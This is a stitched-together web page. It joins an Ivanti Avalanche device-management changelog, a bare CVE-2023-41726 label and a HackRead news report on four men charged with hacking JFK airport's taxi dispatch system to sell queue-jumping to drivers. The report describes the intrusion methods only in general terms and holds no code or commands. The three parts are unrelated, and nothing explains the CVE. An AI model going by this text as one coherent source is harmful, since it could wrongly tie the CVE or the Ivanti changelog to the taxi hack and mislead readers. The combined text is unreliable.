HTTPS Cert, SDS Public Address, Automatic Smart Device Check In, Smart Device Client Administrator Password. SDS Profiles Inheritance has changed, they will aggregate settings instead of overwriting. This allows you to set things like APNS, GCM and wildcard HTTPS certs at a higher level and have them set at lower SDS in the tree. You can then set specific settings such as the SDS public address, or check in times at a locally applied SDS profile. Device Folder Assignment setting allows the enrollment to be placed in a static folder or dynamically place based on folder selection criteria UDP Service Discovery allows the SDS to listen for enrollment broadcasts from the enabler. Central File Store These settings allow you to point to a file share. Files can be uploaded and managed via the Central File Store. You can then use these files in Android manifest URL software payloads, Android file payloads and Android OS Update payloads. Upon deployment of these payloads to an SDS the files will be cached in a file store local to the SDS. Implemented Zebra MX Extensions Now Android Agent applies StageNow config file "avamxmf.xml" placed specific location on SD card "/sdcard/Ivanti/MXMF" using MX framework. Log "MXMS configuration XML file applied successfully" will be displayed when MX config file applied. New Features and Improvements: Scalability - multiple SDS support Improved ANS reliability Distributed file caching Upgrade to Tomcat 8.5 Android device restrictions for post Kitkat devices Vendor specific enablers - Panasonic, Datalogic, Zebra GCM and ANS enabler functionality combined into single enabler Hide Google search box Zebra MX Extensions Reference (Global) enrollment rules Updated passcode payload Updated Restrictions payloads Restrict access to setting application Updated Application whitelisting Updated Application blacklisting Combined GCM and ANS enabler Device wiped if device admin is disabled Devices can broadcast to find their local Avalanche instance and enroll Set NTP server and time zone on device Ivanti Rebrand Removed: DEP Support (system settings and enrollment rule) VPP (Tools>VPP) Windows Phone 8 support (payloads, system settings) LDAP for Login and Enrollment + LDMS connection info (system settings) LDAP Enrollment (Enrollment rule) User Targeting (system settings, user tree) LD Portal (software payload deployment option, link payload deployment option) Media Payload Check for updates (Tools>Check for updates) Android Remote Control Settings (System Settings) Wavelink Remote Control Button in Inventory Page Tiny URL column on enrollment rule page Enabler: Home screen with Remote Control Server Address Enabler: About Screen Enabler: Remote Control capability Fixes: Fix: Improved data validation for java beans Fix: Manifest app installation in android client Fix: Improved functionality with self-signed certificates Fix: Deployments rolled back in large systems Fix: Devices Overwriting one another on Enroll Fix: IP Ranges in selection criteria were treated as a string and not numerically Fix: Data from other payloads sometimes displayed in a new payload

CVE-2023-41726

By Waqas
A cybersecurity incident apparently involving collaboration between Russians and Americans...
This is a post from HackRead.com Read the original post: Russian Pair Charged with JFK Airport Taxi System Hack for Over 2 Years

Two Russian hackers and two Americans have been accused of a two-year-long hacking scheme involving the taxi dispatch system at JFK Airport, where they earned over $100,000 by assisting taxi drivers in skipping the line.

Two Russian nationals, Aleksandr Derebenetc (aka Sasha Novgorod) and Kirill Shipulin (aka Kirill Russia), have been charged with hacking the taxi dispatch system at John F. Kennedy International Airport (JFK).

Talking about taxis and hacking; **in September 2022**, Anonymous hacktivists, in cooperation with the IT Army of Ukraine, hacked the app for the ride-hailing service Yandex Taxi in Moscow, Russia, causing a massive traffic jam.

The indictment was unsealed by Damian Williams, the United States Attorney for the Southern District of New York, and the Inspector General of the Port Authority of New York and New Jersey, John Gay.

Two American nationals, Daniel Abayev, 47, and Peter Leyman, 49, both hailing from Queens, NY, have been accused of collaborating with the Russians to move certain taxis to the front of the line in exchange for payment. The scheme started in September 2019 and continued until September 2021. 

According to the **indictment**, the four individuals used several tactics, including malware, social engineering, and stolen passwords, to access the JFK taxi dispatch system, and conspired to let their desired taxi drivers bypass the long wait times and cut in line.

Abayev and Leyman helped Derebenetc, 30, of Nizhniy Novgorod, Russia, and Shipulin,30, of Moscow, Russia, by recruiting taxi drivers and collecting payments. In addition, they acted as the operation’s frontmen and stayed in touch with the drivers to decide which ones would skip the queue.

Prosecutors allege that the conspirators developed a plan to hack the dispatch systems in 2019 and tried several strategies, such as bribing people to insert a malware-infected flash drive into the computers connected with the taxi system, gaining unauthorized access to the dispatch system through a WiFi connection, and stealing computer tablets that were connected to that system.

Once they infiltrated the dispatch system, the conspirators used messaging apps to communicate with the drivers, give them instructions, and select the drivers who would skip the line and at what time.

When they had access to the system, they would message the drivers “Shop Open,” and when the connection wasn’t successful, they would message them “Shop Closed.” The perpetrators also issued warnings to the drivers to prevent them from going to certain areas around the airport and raising suspicion. 

According to the court filing, the conspirators gained and lost access to the taxi system repeatedly. When they had access, they offered the drivers to move to the front of the dispatch queue for a $10 fee and waived it for those who convinced other drivers to participate in this scheme. 

Many drivers benefitted from this service, noted the US Department of Justice. The gang booked 2,463 queue cuts in a single week during December 2019. Through this scheme, the conspirators enabled at least 1,000 trips daily, and it turned out to be a profitable venture for them as they made over $100,000.

Derbentec and Shipulin are charged with two counts of conspiracy to commit computer intrusion, which carry a maximum sentence of ten years in prison. Abayev and Leyman, have pled guilty to one count of conspiracy to commit computer intrusion and face a maximum sentence of five years.

> __“As_ alleged in the indictment, these four defendants conspired to hack into the taxi dispatch system at JFK airport. Cyber hacking can pose grave threats to infrastructure systems that we rely on every day, and our Office is dedicated to pursuing criminal hackers, whether they be in Russia or here in New York.”_
> 
> U.S. Attorney Damian Williams

**_**RELATED ARTICLES**_**

1.  Russian Dark Net Markets Dominate the Global Illicit Drug Trade
2.  Military Satellite Access Sold on Russian Hacker Forum for $15,000
3.  2 San Francisco Int. airport websites hacked with info-stealer code
4.  Russian Hackers Employ Telekopye Toolkit in Broad Phishing Attacks
5.  Power Grids to Airports: TETRA Radio Hacking Risks Global Infrastructure

Tag

#wifi